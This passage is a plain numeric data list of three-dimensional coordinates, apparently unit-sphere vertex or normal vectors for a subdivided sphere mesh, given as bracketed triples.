[0.416404157877,-0.419940322638,0.806385576725],
[0.468421578407,-0.174905076623,0.866019308567],
[0.529480218887,-0.153434738517,0.834331154823],
[0.506734728813,-0.217834427953,0.834127128124],
[0.509656965733,-0.0549761541188,0.858619451523],
[0.564633131027,-0.0339771322906,0.82464236021],
[0.548688352108,-0.091976031661,0.830952167511],
[0.588087081909,-0.131048902869,0.798110127449],
[0.643326640129,-0.108097285032,0.757922053337],
[0.627150595188,-0.171839639544,0.759706020355],
[0.548688352108,-0.091976031661,0.830952167511],
[0.588087081909,-0.131048902869,0.798110127449],
[0.529480218887,-0.153434738517,0.834331154823],
[0.618283927441,-0.353819847107,0.701809465885],
[0.678621411324,-0.327040165663,0.657660841942],
[0.65135627985,-0.398910075426,0.645450055599],
[0.665048420429,-0.213841319084,0.715529501438],
[0.718357801437,-0.188148602843,0.669747889042],
[0.700865805149,-0.256401896477,0.665616393089],
[0.733673810959,-0.298754066229,0.610302150249],
[0.782811582088,-0.269586592913,0.560828924179],
[0.762617051601,-0.340069264174,0.550243675709],
[0.700865805149,-0.256401896477,0.665616393089],
[0.733673810959,-0.298754066229,0.610302150249],
[0.678621411324,-0.327040165663,0.657660841942],
[0.506734728813,-0.217834427953,0.834127128124],
[0.545040607452,-0.26241543889,0.796284377575],
[0.480284929276,-0.284414708614,0.829719662666],
[0.627150595188,-0.171839639544,0.759706020355],
[0.665048420429,-0.213841319084,0.715529501438],
[0.606988489628,-0.238753452897,0.757998526096],
[0.582528710365,-0.308011889458,0.752189457417],
[0.618283927441,-0.353819847107,0.701809465885],
[0.553625464439,-0.378517180681,0.74177056551],
[0.606988489628,-0.238753452897,0.757998526096],
[0.582528710365,-0.308011889458,0.752189457417],
[0.545040607452,-0.26241543889,0.796284377575],
[0.550243675709,-0.762617051601,0.340069264174],
[0.610302150249,-0.733673810959,0.298754066229],
[0.560828924179,-0.782811582088,0.269586592913],
[0.645450055599,-0.65135627985,0.398910075426],
[0.701809465885,-0.618283927441,0.353819847107],
[0.657660841942,-0.678621411324,0.327040165663],
[0.665616393089,-0.700865805149,0.256401896477],
[0.715529501438,-0.665048420429,0.213841319084],
[0.669747889042,-0.718357801437,0.188148602843],
[0.657660841942,-0.678621411324,0.327040165663],
[0.665616393089,-0.700865805149,0.256401896477],
[0.610302150249,-0.733673810959,0.298754066229],
[0.726413309574,-0.520354926586,0.44894811511],
[0.776785671711,-0.485873311758,0.400663375854],
[0.74177056551,-0.553625464439,0.378517180681],
[0.787004828453,-0.379529476166,0.486395716667],
[0.830415487289,-0.346611320972,0.436200261116],
[0.806385576725,-0.416404157877,0.419940322638],
[0.820587992668,-0.450116455555,0.352179646492],
[0.857896447182,-0.413926929235,0.3044308424],
[0.829719662666,-0.480284929276,0.284414708614],
[0.806385576725,-0.416404157877,0.419940322638],
[0.820587992668,-0.450116455555,0.352179646492],
[0.776785671711,-0.485873311758,0.400663375854],
[0.759706020355,-0.627150595188,0.171839639544],
[0.798110127449,-0.588087081909,0.131048902869],
[0.757922053337,-0.643326640129,0.108097285032],
[0.834127128124,-0.506734728813,0.217834427953],
[0.866019308567,-0.468421578407,0.174905076623],
[0.834331154823,-0.529480218887,0.153434738517],
[0.830952167511,-0.548688352108,0.091976031661],
[0.858619451523,-0.509656965733,0.0549761541188],
[0.82464236021,-0.564633131027,0.0339771322906],
[0.834331154823,-0.529480218887,0.153434738517],
[0.830952167511,-0.548688352108,0.091976031661],
[0.798110127449,-0.588087081909,0.131048902869],
[0.74177056551,-0.553625464439,0.378517180681],
[0.752189457417,-0.582528710365,0.308011889458],
[0.701809465885,-0.618283927441,0.353819847107],
[0.829719662666,-0.480284929276,0.284414708614],
[0.834127128124,-0.506734728813,0.217834427953],
[0.796284377575,-0.545040607452,0.26241543889],
[0.757998526096,-0.606988489628,0.238753452897],
[0.759706020355,-0.627150595188,0.171839639544],
[0.715529501438,-0.665048420429,0.213841319084],
[0.796284377575,-0.545040607452,0.26241543889],
[0.757998526096,-0.606988489628,0.238753452897],
[0.752189457417,-0.582528710365,0.308011889458],
[0.379529476166,-0.486395716667,0.787004828453],
[0.411682873964,-0.535965919495,0.737060189247],
[0.340069264174,-0.550243675709,0.762617051601],
[0.520354926586,-0.44894811511,0.726413309574],
[0.552667617798,-0.495975226164,0.669751524925],
[0.483050197363,-0.517854511738,0.706037700176],
[0.44230055809,-0.58378881216,0.680853009224],
[0.470621615648,-0.628728508949,0.619044244289],
[0.398910075426,-0.645450055599,0.65135627985],
[0.483050197363,-0.517854511738,0.706037700176],
[0.44230055809,-0.58378881216,0.680853009224],
[0.411682873964,-0.535965919495,0.737060189247],
[0.65135627985,-0.398910075426,0.645450055599],
[0.680853009224,-0.44230055809,0.58378881216],
[0.619044244289,-0.470621615648,0.628728508949],
[0.762617051601,-0.340069264174,0.550243675709],
[0.787004828453,-0.379529476166,0.486395716667],
[0.737060189247,-0.411682873964,0.535965919495],
[0.706037700176,-0.483050197363,0.517854511738],
[0.726413309574,-0.520354926586,0.44894811511],
[0.669751524925,-0.552667617798,0.495975226164],
[0.737060189247,-0.411682873964,0.535965919495],
[0.706037700176,-0.483050197363,0.517854511738],
[0.680853009224,-0.44230055809,0.58378881216],
[0.495975226164,-0.669751524925,0.552667617798],
[0.517854511738,-0.706037700176,0.483050197363],
[0.44894811511,-0.726413309574,0.520354926586],
[0.628728508949,-0.619044244289,0.470621615648],
[0.645450055599,-0.65135627985,0.398910075426],
[0.58378881216,-0.680853009224,0.44230055809],
[0.535965919495,-0.737060189247,0.411682873964],
[0.550243675709,-0.762617051601,0.340069264174],
[0.486395716667,-0.787004828453,0.379529476166],
[0.58378881216,-0.680853009224,0.44230055809],
[0.535965919495,-0.737060189247,0.411682873964],
[0.517854511738,-0.706037700176,0.483050197363],
[0.619044244289,-0.470621615648,0.628728508949],
[0.581951975822,-0.540649950504,0.607478022575],
[0.552667617798,-0.495975226164,0.669751524925],
[0.669751524925,-0.552667617798,0.495975226164],
[0.628728508949,-0.619044244289,0.470621615648],
[0.607478022575,-0.581951975822,0.540649950504],
[0.540649950504,-0.607478022575,0.581951975822],
[0.495975226164,-0.669751524925,0.552667617798],
[0.470621615648,-0.628728508949,0.619044244289],
[0.607478022575,-0.581951975822,0.540649950504],
[0.540649950504,-0.607478022575,0.581951975822],
[0.581951975822,-0.540649950504,0.607478022575],
[0.82464236021,-0.564633131027,-0.0339771322906],
[0.79582041502,-0.605532705784,0.0],
[0.82464236021,-0.564633131027,0.0339771322906],
[0.757922053337,-0.643326640129,-0.108097285032],
[0.722495436668,-0.687358558178,-0.0744211226702],
[0.761889100075,-0.646693944931,-0.0362210273743],
[0.761889100075,-0.646693944931,0.0362210273743],
[0.722495436668,-0.687358558178,0.0744211226702],
[0.757922053337,-0.643326640129,0.108097285032],
[0.761889100075,-0.646693944931,-0.0362210273743],
[0.761889100075,-0.646693944931,0.0362210273743],
[0.79582041502,-0.605532705784,0.0],
[0.669747889042,-0.718357801437,-0.188148602843],
[0.62687343359,-0.763553202152,-0.154971644282],
[0.677466154099,-0.726636230946,-0.114190116525],
[0.560828924179,-0.782811582088,-0.269586592913],
[0.510783493519,-0.826465010643,-0.236761152744],
[0.571085453033,-0.797127783298,-0.196083456278],
[0.578244268894,-0.807120084763,-0.119124859571],
[0.524005174637,-0.847858190536,-0.0809632539749],
[0.581926107407,-0.81225925684,-0.0399611219764],
[0.571085453033,-0.797127783298,-0.196083456278],
[0.578244268894,-0.807120084763,-0.119124859571],
[0.62687343359,-0.763553202152,-0.154971644282],
[0.677466154099,-0.726636230946,0.114190116525],
[0.62687343359,-0.763553202152,0.154971644282],
[0.669747889042,-0.718357801437,0.188148602843],
[0.581926107407,-0.81225925684,0.0399611219764],
[0.524005174637,-0.847858190536,0.0809632539749],
[0.578244268894,-0.807120084763,0.119124859571],
[0.571085453033,-0.797127783298,0.196083456278],
[0.510783493519,-0.826465010643,0.236761152744],
[0.560828924179,-0.782811582088,0.269586592913],
[0.578244268894,-0.807120084763,0.119124859571],
[0.571085453033,-0.797127783298,0.196083456278],
[0.62687343359,-0.763553202152,0.154971644282],
[0.677466154099,-0.726636230946,-0.114190116525],
[0.68142670393,-0.730884253979,-0.0382858961821],
[0.722495436668,-0.687358558178,-0.0744211226702],
[0.581926107407,-0.81225925684,-0.0399611219764],
[0.581926107407,-0.81225925684,0.0399611219764],
[0.634539365768,-0.772890508175,0.0],
[0.68142670393,-0.730884253979,0.0382858961821],
[0.677466154099,-0.726636230946,0.114190116525],
[0.722495436668,-0.687358558178,0.0744211226702],
[0.634539365768,-0.772890508175,0.0],
[0.68142670393,-0.730884253979,0.0382858961821],
[0.68142670393,-0.730884253979,-0.0382858961821],
[0.436200261116,-0.830415487289,-0.346611320972],
[0.380723625422,-0.869839549065,-0.313733518124],
[0.446935534477,-0.85085272789,-0.276221334934],
[0.3044308424,-0.857896447182,-0.413926929235],
[0.246351331472,-0.891307473183,-0.380633711815],
[0.313436716795,-0.883275330067,-0.348686188459],
[0.321246802807,-0.905284404755,-0.277958005667],
[0.258633822203,-0.935745954514,-0.239766731858],
[0.327503234148,-0.922915279865,-0.202408134937],
[0.313436716795,-0.883275330067,-0.348686188459],
[0.321246802807,-0.905284404755,-0.277958005667],
[0.380723625422,-0.869839549065,-0.313733518124],
[0.174905076623,-0.866019308567,-0.468421578407],
[0.117213711143,-0.892938017845,-0.434652328491],
[0.180623859167,-0.894335091114,-0.409316182137],
[0.0549761541188,-0.858619451523,-0.509656965733],
[0.0,-0.8796184659,-0.475679844618],
[0.0568443164229,-0.887796461582,-0.456712335348],
[0.0586068555713,-0.915323853493,-0.398431301117],
[0.0,-0.932827115059,-0.360324263573],
[0.0602079555392,-0.940329909325,-0.334895044565],
[0.0568443164229,-0.887796461582,-0.456712335348],
[0.0586068555713,-0.915323853493,-0.398431301117],
[0.117213711143,-0.892938017845,-0.434652328491],
[0.193975359201,-0.960443258286,-0.199805602431],
[0.128498718143,-0.978907585144,-0.158833146095],
[0.196501940489,-0.97295331955,-0.121444880962],
[0.0615878328681,-0.961880862713,-0.266443610191],
[0.0,-0.974178731441,-0.225778326392],
[0.0626873448491,-0.979053080082,-0.193714544177],
[0.0634539350867,-0.991025745869,-0.117650069296],
[0.0,-0.997029185295,-0.0770247355103],
[0.0638479366899,-0.997179210186,-0.0394601933658],
[0.0626873448491,-0.979053080082,-0.193714544177],
[0.0634539350867,-0.991025745869,-0.117650069296],
[0.128498718143,-0.978907585144,-0.158833146095],
[0.180623859167,-0.894335091114,-0.409316182137],
[0.185843646526,-0.920180141926,-0.34457308054],
[0.246351331472,-0.891307473183,-0.380633711815],
[0.0602079555392,-0.940329909325,-0.334895044565],
[0.0615878328681,-0.961880862713,-0.266443610191],
[0.123895764351,-0.943842172623,-0.306287169456],
[0.190361812711,-0.942551255226,-0.274516820908],
[0.193975359201,-0.960443258286,-0.199805602431],
[0.258633822203,-0.935745954514,-0.239766731858],
[0.123895764351,-0.943842172623,-0.306287169456],
[0.190361812711,-0.942551255226,-0.274516820908],
[0.185843646526,-0.920180141926,-0.34457308054],
[0.446935534477,-0.85085272789,0.276221334934],
[0.380723625422,-0.869839549065,0.313733518124],
[0.436200261116,-0.830415487289,0.346611320972],
[0.327503234148,-0.922915279865,0.202408134937],
[0.258633822203,-0.935745954514,0.239766731858],
[0.321246802807,-0.905284404755,0.277958005667],
[0.313436716795,-0.883275330067,0.348686188459],
[0.246351331472,-0.891307473183,0.380633711815],
[0.3044308424,-0.857896447182,0.413926929235],
[0.321246802807,-0.905284404755,0.277958005667],
[0.313436716795,-0.883275330067,0.348686188459],
[0.380723625422,-0.869839549065,0.313733518124],
[0.196501940489,-0.97295331955,0.121444880962],
[0.128498718143,-0.978907585144,0.158833146095],
[0.193975359201,-0.960443258286,0.199805602431],
[0.0638479366899,-0.997179210186,0.0394601933658],
[0.0,-0.997029185295,0.0770247355103],
[0.0634539350867,-0.991025745869,0.117650069296],
[0.0626873448491,-0.979053080082,0.193714544177],
[0.0,-0.974178731441,0.225778326392],
[0.0615878328681,-0.961880862713,0.266443610191],
[0.0634539350867,-0.991025745869,0.117650069296],
[0.0626873448491,-0.979053080082,0.193714544177],
[0.128498718143,-0.978907585144,0.158833146095],
[0.180623859167,-0.894335091114,0.409316182137],
[0.117213711143,-0.892938017845,0.434652328491],
[0.174905076623,-0.866019308567,0.468421578407],
[0.0602079555392,-0.940329909325,0.334895044565],
[0.0,-0.932827115059,0.360324263573],
[0.0586068555713,-0.915323853493,0.398431301117],
[0.0568443164229,-0.887796461582,0.456712335348],
[0.0,-0.8796184659,0.475679844618],
[0.0549761541188,-0.858619451523,0.509656965733],
[0.0586068555713,-0.915323853493,0.398431301117],
[0.0568443164229,-0.887796461582,0.456712335348],
[0.117213711143,-0.892938017845,0.434652328491],
[0.193975359201,-0.960443258286,0.199805602431],
[0.190361812711,-0.942551255226,0.274516820908],
[0.258633822203,-0.935745954514,0.239766731858],
[0.0615878328681,-0.961880862713,0.266443610191],
[0.0602079555392,-0.940329909325,0.334895044565],
[0.123895764351,-0.943842172623,0.306287169456],
[0.185843646526,-0.920180141926,0.34457308054],
[0.180623859167,-0.894335091114,0.409316182137],
[0.246351331472,-0.891307473183,0.380633711815],
[0.123895764351,-0.943842172623,0.306287169456],
[0.185843646526,-0.920180141926,0.34457308054],
[0.190361812711,-0.942551255226,0.274516820908],
[0.446935534477,-0.85085272789,-0.276221334934],
[0.455528259277,-0.867211103439,-0.20109423995],
[0.510783493519,-0.826465010643,-0.236761152744],
[0.327503234148,-0.922915279865,-0.202408134937],
[0.33188316226,-0.935258030891,-0.123069040477],
[0.395605653524,-0.903840482235,-0.162998497486],
[0.461539924145,-0.878655850887,-0.122248865664],
[0.464636415243,-0.88455080986,-0.0410230122507],
[0.524005174637,-0.847858190536,-0.0809632539749],
[0.395605653524,-0.903840482235,-0.162998497486],
[0.461539924145,-0.878655850887,-0.122248865664],
[0.455528259277,-0.867211103439,-0.20109423995],
[0.196501940489,-0.97295331955,-0.121444880962],
[0.197802826762,-0.979394435883,-0.0407496243715],
[0.265506535769,-0.960611641407,-0.0820460245013],
[0.0638479366899,-0.997179210186,-0.0394601933658],
[0.0638479366899,-0.997179210186,0.0394601933658],
[0.130150929093,-0.991494178772,0.0],
[0.197802826762,-0.979394435883,0.0407496243715],
[0.196501940489,-0.97295331955,0.121444880962],
[0.265506535769,-0.960611641407,0.0820460245013],
[0.130150929093,-0.991494178772,0.0],
[0.197802826762,-0.979394435883,0.0407496243715],
[0.197802826762,-0.979394435883,-0.0407496243715],
[0.464636415243,-0.88455080986,0.0410230122507],
[0.461539924145,-0.878655850887,0.122248865664],
[0.524005174637,-0.847858190536,0.0809632539749],
[0.33188316226,-0.935258030891,0.123069040477],
[0.327503234148,-0.922915279865,0.202408134937],
[0.395605653524,-0.903840482235,0.162998497486],
[0.455528259277,-0.867211103439,0.20109423995],
[0.446935534477,-0.85085272789,0.276221334934],
[0.510783493519,-0.826465010643,0.236761152744],
[0.395605653524,-0.903840482235,0.162998497486],
[0.455528259277,-0.867211103439,0.20109423995],
[0.461539924145,-0.878655850887,0.122248865664],
[0.265506535769,-0.960611641407,-0.0820460245013],
[0.334140062332,-0.941618084908,-0.04130198434],
[0.33188316226,-0.935258030891,-0.123069040477],
[0.265506535769,-0.960611641407,0.0820460245013],
[0.33188316226,-0.935258030891,0.123069040477],
[0.334140062332,-0.941618084908,0.04130198434],
[0.400968074799,-0.916092038155,0.0],
[0.464636415243,-0.88455080986,0.0410230122507],
[0.464636415243,-0.88455080986,-0.0410230122507],
[0.334140062332,-0.941618084908,0.04130198434],
[0.400968074799,-0.916092038155,0.0],
[0.334140062332,-0.941618084908,-0.04130198434],
[-0.82464236021,-0.564633131027,-0.0339771322906],
[-0.830952167511,-0.548688352108,-0.091976031661],
[-0.858619451523,-0.509656965733,-0.0549761541188],
[-0.757922053337,-0.643326640129,-0.108097285032],
[-0.759706020355,-0.627150595188,-0.171839639544],
[-0.798110127449,-0.588087081909,-0.131048902869],
[-0.834331154823,-0.529480218887,-0.153434738517],
[-0.834127128124,-0.506734728813,-0.217834427953],
[-0.866019308567,-0.468421578407,-0.174905076623],
[-0.798110127449,-0.588087081909,-0.131048902869],
[-0.834331154823,-0.529480218887,-0.153434738517],
[-0.830952167511,-0.548688352108,-0.091976031661],
[-0.669747889042,-0.718357801437,-0.188148602843],
[-0.665616393089,-0.700865805149,-0.256401896477],
[-0.715529501438,-0.665048420429,-0.213841319084],
[-0.560828924179,-0.782811582088,-0.269586592913],
[-0.550243675709,-0.762617051601,-0.340069264174],
[-0.610302150249,-0.733673810959,-0.298754066229],
[-0.657660841942,-0.678621411324,-0.327040165663],
[-0.645450055599,-0.65135627985,-0.398910075426],
[-0.701809465885,-0.618283927441,-0.353819847107],
[-0.610302150249,-0.733673810959,-0.298754066229],
[-0.657660841942,-0.678621411324,-0.327040165663],
[-0.665616393089,-0.700865805149,-0.256401896477],
[-0.829719662666,-0.480284929276,-0.284414708614],
[-0.820587992668,-0.450116455555,-0.352179646492],
[-0.857896447182,-0.413926929235,-0.3044308424],
[-0.74177056551,-0.553625464439,-0.378517180681],
[-0.726413309574,-0.520354926586,-0.44894811511],
[-0.776785671711,-0.485873311758,-0.400663375854],
[-0.806385576725,-0.416404157877,-0.419940322638],
[-0.787004828453,-0.379529476166,-0.486395716667],
[-0.830415487289,-0.346611320972,-0.436200261116],
[-0.776785671711,-0.485873311758,-0.400663375854],
[-0.806385576725,-0.416404157877,-0.419940322638],
[-0.820587992668,-0.450116455555,-0.352179646492],
[-0.715529501438,-0.665048420429,-0.213841319084],
[-0.757998526096,-0.606988489628,-0.238753452897],
[-0.759706020355,-0.627150595188,-0.171839639544],
[-0.701809465885,-0.618283927441,-0.353819847107],
[-0.74177056551,-0.553625464439,-0.378517180681],
[-0.752189457417,-0.582528710365,-0.308011889458],
[-0.796284377575,-0.545040607452,-0.26241543889],
[-0.829719662666,-0.480284929276,-0.284414708614],
[-0.834127128124,-0.506734728813,-0.217834427953],
[-0.752189457417,-0.582528710365,-0.308011889458],
[-0.796284377575,-0.545040607452,-0.26241543889],
[-0.757998526096,-0.606988489628,-0.238753452897],
[-0.436200261116,-0.830415487289,-0.346611320972],
[-0.419940322638,-0.806385576725,-0.416404157877],
[-0.486395716667,-0.787004828453,-0.379529476166],
[-0.3044308424,-0.857896447182,-0.413926929235],
[-0.284414708614,-0.829719662666,-0.480284929276],
[-0.352179646492,-0.820587992668,-0.450116455555],
[-0.400663375854,-0.776785671711,-0.485873311758],
[-0.378517180681,-0.74177056551,-0.553625464439],
[-0.44894811511,-0.726413309574,-0.520354926586],
[-0.352179646492,-0.820587992668,-0.450116455555],
[-0.400663375854,-0.776785671711,-0.485873311758],
[-0.419940322638,-0.806385576725,-0.416404157877],
[-0.174905076623,-0.866019308567,-0.468421578407],
[-0.153434738517,-0.834331154823,-0.529480218887],
[-0.217834427953,-0.834127128124,-0.506734728813],
[-0.0549761541188,-0.858619451523,-0.509656965733],
[-0.0339771322906,-0.82464236021,-0.564633131027],
[-0.091976031661,-0.830952167511,-0.548688352108],
[-0.131048902869,-0.798110127449,-0.588087081909],
[-0.108097285032,-0.757922053337,-0.643326640129],
[-0.171839639544,-0.759706020355,-0.627150595188],
[-0.091976031661,-0.830952167511,-0.548688352108],
[-0.131048902869,-0.798110127449,-0.588087081909],
[-0.153434738517,-0.834331154823,-0.529480218887],
[-0.353819847107,-0.701809465885,-0.618283927441],
[-0.327040165663,-0.657660841942,-0.678621411324],
[-0.398910075426,-0.645450055599,-0.65135627985],
[-0.213841319084,-0.715529501438,-0.665048420429],
[-0.188148602843,-0.669747889042,-0.718357801437],
[-0.256401896477,-0.665616393089,-0.700865805149],
[-0.298754066229,-0.610302150249,-0.733673810959],
[-0.269586592913,-0.560828924179,-0.782811582088],
[-0.340069264174,-0.550243675709,-0.762617051601],
[-0.256401896477,-0.665616393089,-0.700865805149],
[-0.298754066229,-0.610302150249,-0.733673810959],
[-0.327040165663,-0.657660841942,-0.678621411324],
[-0.217834427953,-0.834127128124,-0.506734728813],
[-0.26241543889,-0.796284377575,-0.545040607452],
[-0.284414708614,-0.829719662666,-0.480284929276],
[-0.171839639544,-0.759706020355,-0.627150595188],
[-0.213841319084,-0.715529501438,-0.665048420429],
[-0.238753452897,-0.757998526096,-0.606988489628],
[-0.308011889458,-0.752189457417,-0.582528710365],
[-0.353819847107,-0.701809465885,-0.618283927441],
[-0.378517180681,-0.74177056551,-0.553625464439],
[-0.238753452897,-0.757998526096,-0.606988489628],
[-0.308011889458,-0.752189457417,-0.582528710365],
[-0.26241543889,-0.796284377575,-0.545040607452],
[-0.762617051601,-0.340069264174,-0.550243675709],
[-0.733673810959,-0.298754066229,-0.610302150249],
[-0.782811582088,-0.269586592913,-0.560828924179],
[-0.65135627985,-0.398910075426,-0.645450055599],
[-0.618283927441,-0.353819847107,-0.701809465885],
[-0.678621411324,-0.327040165663,-0.657660841942],
[-0.700865805149,-0.256401896477,-0.665616393089],
[-0.665048420429,-0.213841319084,-0.715529501438],
[-0.718357801437,-0.188148602843,-0.669747889042],
[-0.678621411324,-0.327040165663,-0.657660841942],
[-0.700865805149,-0.256401896477,-0.665616393089],
[-0.733673810959,-0.298754066229,-0.610302150249],
[-0.520354926586,-0.44894811511,-0.726413309574],
[-0.485873311758,-0.400663375854,-0.776785671711],
[-0.553625464439,-0.378517180681,-0.74177056551],
[-0.379529476166,-0.486395716667,-0.787004828453],
[-0.346611320972,-0.436200261116,-0.830415487289],
[-0.416404157877,-0.419940322638,-0.806385576725],
[-0.450116455555,-0.352179646492,-0.820587992668],
[-0.413926929235,-0.3044308424,-0.857896447182],
[-0.480284929276,-0.284414708614,-0.829719662666],
[-0.416404157877,-0.419940322638,-0.806385576725],
[-0.450116455555,-0.352179646492,-0.820587992668],
[-0.485873311758,-0.400663375854,-0.776785671711],
[-0.627150595188,-0.171839639544,-0.759706020355],
[-0.588087081909,-0.131048902869,-0.798110127449],
[-0.643326640129,-0.108097285032,-0.757922053337],
[-0.506734728813,-0.217834427953,-0.834127128124],
[-0.468421578407,-0.174905076623,-0.866019308567],
[-0.529480218887,-0.153434738517,-0.834331154823],
[-0.548688352108,-0.091976031661,-0.830952167511],
[-0.509656965733,-0.0549761541188,-0.858619451523],
[-0.564633131027,-0.0339771322906,-0.82464236021],
[-0.529480218887,-0.153434738517,-0.834331154823],
[-0.548688352108,-0.091976031661,-0.830952167511],
[-0.588087081909,-0.131048902869,-0.798110127449],
[-0.553625464439,-0.378517180681,-0.74177056551],
[-0.582528710365,-0.308011889458,-0.752189457417],
[-0.618283927441,-0.353819847107,-0.701809465885],
[-0.480284929276,-0.284414708614,-0.829719662666],
[-0.506734728813,-0.217834427953,-0.834127128124],
[-0.545040607452,-0.26241543889,-0.796284377575],
[-0.606988489628,-0.238753452897,-0.757998526096],
[-0.627150595188,-0.171839639544,-0.759706020355],
[-0.665048420429,-0.213841319084,-0.715529501438],
[-0.545040607452,-0.26241543889,-0.796284377575],
[-0.606988489628,-0.238753452897,-0.757998526096],
[-0.582528710365,-0.308011889458,-0.752189457417],
[-0.486395716667,-0.787004828453,-0.379529476166],
[-0.535965919495,-0.737060189247,-0.411682873964],
[-0.550243675709,-0.762617051601,-0.340069264174],
[-0.44894811511,-0.726413309574,-0.520354926586],
[-0.495975226164,-0.669751524925,-0.552667617798],
[-0.517854511738,-0.706037700176,-0.483050197363],
[-0.58378881216,-0.680853009224,-0.44230055809],
[-0.628728508949,-0.619044244289,-0.470621615648],
[-0.645450055599,-0.65135627985,-0.398910075426],
[-0.517854511738,-0.706037700176,-0.483050197363],
[-0.58378881216,-0.680853009224,-0.44230055809],
[-0.535965919495,-0.737060189247,-0.411682873964],
[-0.398910075426,-0.645450055599,-0.65135627985],
[-0.44230055809,-0.58378881216,-0.680853009224],
[-0.470621615648,-0.628728508949,-0.619044244289],
[-0.340069264174,-0.550243675709,-0.762617051601],
[-0.379529476166,-0.486395716667,-0.787004828453],
[-0.411682873964,-0.535965919495,-0.737060189247],
[-0.483050197363,-0.517854511738,-0.706037700176],
[-0.520354926586,-0.44894811511,-0.726413309574],
[-0.552667617798,-0.495975226164,-0.669751524925],
[-0.411682873964,-0.535965919495,-0.737060189247],
[-0.483050197363,-0.517854511738,-0.706037700176],
[-0.44230055809,-0.58378881216,-0.680853009224],
[-0.669751524925,-0.552667617798,-0.495975226164],
[-0.706037700176,-0.483050197363,-0.517854511738],
[-0.726413309574,-0.520354926586,-0.44894811511],
[-0.619044244289,-0.470621615648,-0.628728508949],
[-0.65135627985,-0.398910075426,-0.645450055599],
[-0.680853009224,-0.44230055809,-0.58378881216],
[-0.737060189247,-0.411682873964,-0.535965919495],
[-0.762617051601,-0.340069264174,-0.550243675709],
[-0.787004828453,-0.379529476166,-0.486395716667],
[-0.680853009224,-0.44230055809,-0.58378881216],
[-0.737060189247,-0.411682873964,-0.535965919495],
[-0.706037700176,-0.483050197363,-0.517854511738],
[-0.470621615648,-0.628728508949,-0.619044244289],
[-0.540649950504,-0.607478022575,-0.581951975822],
[-0.495975226164,-0.669751524925,-0.552667617798],
[-0.552667617798,-0.495975226164,-0.669751524925],
[-0.619044244289,-0.470621615648,-0.628728508949],
[-0.581951975822,-0.540649950504,-0.607478022575],
[-0.607478022575,-0.581951975822,-0.540649950504],
[-0.669751524925,-0.552667617798,-0.495975226164],
[-0.628728508949,-0.619044244289,-0.470621615648],
[-0.581951975822,-0.540649950504,-0.607478022575],
[-0.607478022575,-0.581951975822,-0.540649950504],
[-0.540649950504,-0.607478022575,-0.581951975822],
[0.0549761541188,-0.858619451523,-0.509656965733],
[0.091976031661,-0.830952167511,-0.548688352108],
[0.0339771322906,-0.82464236021,-0.564633131027],
[0.174905076623,-0.866019308567,-0.468421578407],
[0.217834427953,-0.834127128124,-0.506734728813],
[0.153434738517,-0.834331154823,-0.529480218887],
[0.131048902869,-0.798110127449,-0.588087081909],
[0.171839639544,-0.759706020355,-0.627150595188],
[0.108097285032,-0.757922053337,-0.643326640129],
[0.153434738517,-0.834331154823,-0.529480218887],
[0.131048902869,-0.798110127449,-0.588087081909],
[0.091976031661,-0.830952167511,-0.548688352108],
[0.3044308424,-0.857896447182,-0.413926929235],
[0.352179646492,-0.820587992668,-0.450116455555],
[0.284414708614,-0.829719662666,-0.480284929276],
[0.436200261116,-0.830415487289,-0.346611320972],
[0.486395716667,-0.787004828453,-0.379529476166],
[0.419940322638,-0.806385576725,-0.416404157877],
[0.400663375854,-0.776785671711,-0.485873311758],
[0.44894811511,-0.726413309574,-0.520354926586],
[0.378517180681,-0.74177056551,-0.553625464439],
[0.419940322638,-0.806385576725,-0.416404157877],
[0.400663375854,-0.776785671711,-0.485873311758],
[0.352179646492,-0.820587992668,-0.450116455555],
[0.213841319084,-0.715529501438,-0.665048420429],
[0.256401896477,-0.665616393089,-0.700865805149],
[0.188148602843,-0.669747889042,-0.718357801437],
[0.353819847107,-0.701809465885,-0.618283927441],
[0.398910075426,-0.645450055599,-0.65135627985],
[0.327040165663,-0.657660841942,-0.678621411324],
[0.298754066229,-0.610302150249,-0.733673810959],
[0.340069264174,-0.550243675709,-0.762617051601],
[0.269586592913,-0.560828924179,-0.782811582088],
[0.327040165663,-0.657660841942,-0.678621411324],
[0.298754066229,-0.610302150249,-0.733673810959],
[0.256401896477,-0.665616393089,-0.700865805149],
[0.284414708614,-0.829719662666,-0.480284929276],
[0.26241543889,-0.796284377575,-0.545040607452],
[0.217834427953,-0.834127128124,-0.506734728813],
[0.378517180681,-0.74177056551,-0.553625464439],
[0.353819847107,-0.701809465885,-0.618283927441],
[0.308011889458,-0.752189457417,-0.582528710365],
[0.238753452897,-0.757998526096,-0.606988489628],
[0.213841319084,-0.715529501438,-0.665048420429],
[0.171839639544,-0.759706020355,-0.627150595188],
[0.308011889458,-0.752189457417,-0.582528710365],
[0.238753452897,-0.757998526096,-0.606988489628],
[0.26241543889,-0.796284377575,-0.545040607452],
[0.560828924179,-0.782811582088,-0.269586592913],
[0.610302150249,-0.733673810959,-0.298754066229],
[0.550243675709,-0.762617051601,-0.340069264174],
[0.669747889042,-0.718357801437,-0.188148602843],
[0.715529501438,-0.665048420429,-0.213841319084],
[0.665616393089,-0.700865805149,-0.256401896477],
[0.657660841942,-0.678621411324,-0.327040165663],
[0.701809465885,-0.618283927441,-0.353819847107],
[0.645450055599,-0.65135627985,-0.398910075426],
[0.665616393089,-0.700865805149,-0.256401896477],
[0.657660841942,-0.678621411324,-0.327040165663],
[0.610302150249,-0.733673810959,-0.298754066229],
[0.757922053337,-0.643326640129,-0.108097285032],
[0.798110127449,-0.588087081909,-0.131048902869],
[0.759706020355,-0.627150595188,-0.171839639544],
[0.82464236021,-0.564633131027,-0.0339771322906],
[0.858619451523,-0.509656965733,-0.0549761541188],
[0.830952167511,-0.548688352108,-0.091976031661],
[0.834331154823,-0.529480218887,-0.153434738517],
[0.866019308567,-0.468421578407,-0.174905076623],
[0.834127128124,-0.506734728813,-0.217834427953],
[0.830952167511,-0.548688352108,-0.091976031661],
[0.834331154823,-0.529480218887,-0.153434738517],
[0.798110127449,-0.588087081909,-0.131048902869],
[0.74177056551,-0.553625464439,-0.378517180681],
[0.776785671711,-0.485873311758,-0.400663375854],
[0.726413309574,-0.520354926586,-0.44894811511],
[0.829719662666,-0.480284929276,-0.284414708614],
[0.857896447182,-0.413926929235,-0.3044308424],
[0.820587992668,-0.450116455555,-0.352179646492],
[0.806385576725,-0.416404157877,-0.419940322638],
[0.830415487289,-0.346611320972,-0.436200261116],
[0.787004828453,-0.379529476166,-0.486395716667],
[0.820587992668,-0.450116455555,-0.352179646492],
[0.806385576725,-0.416404157877,-0.419940322638],
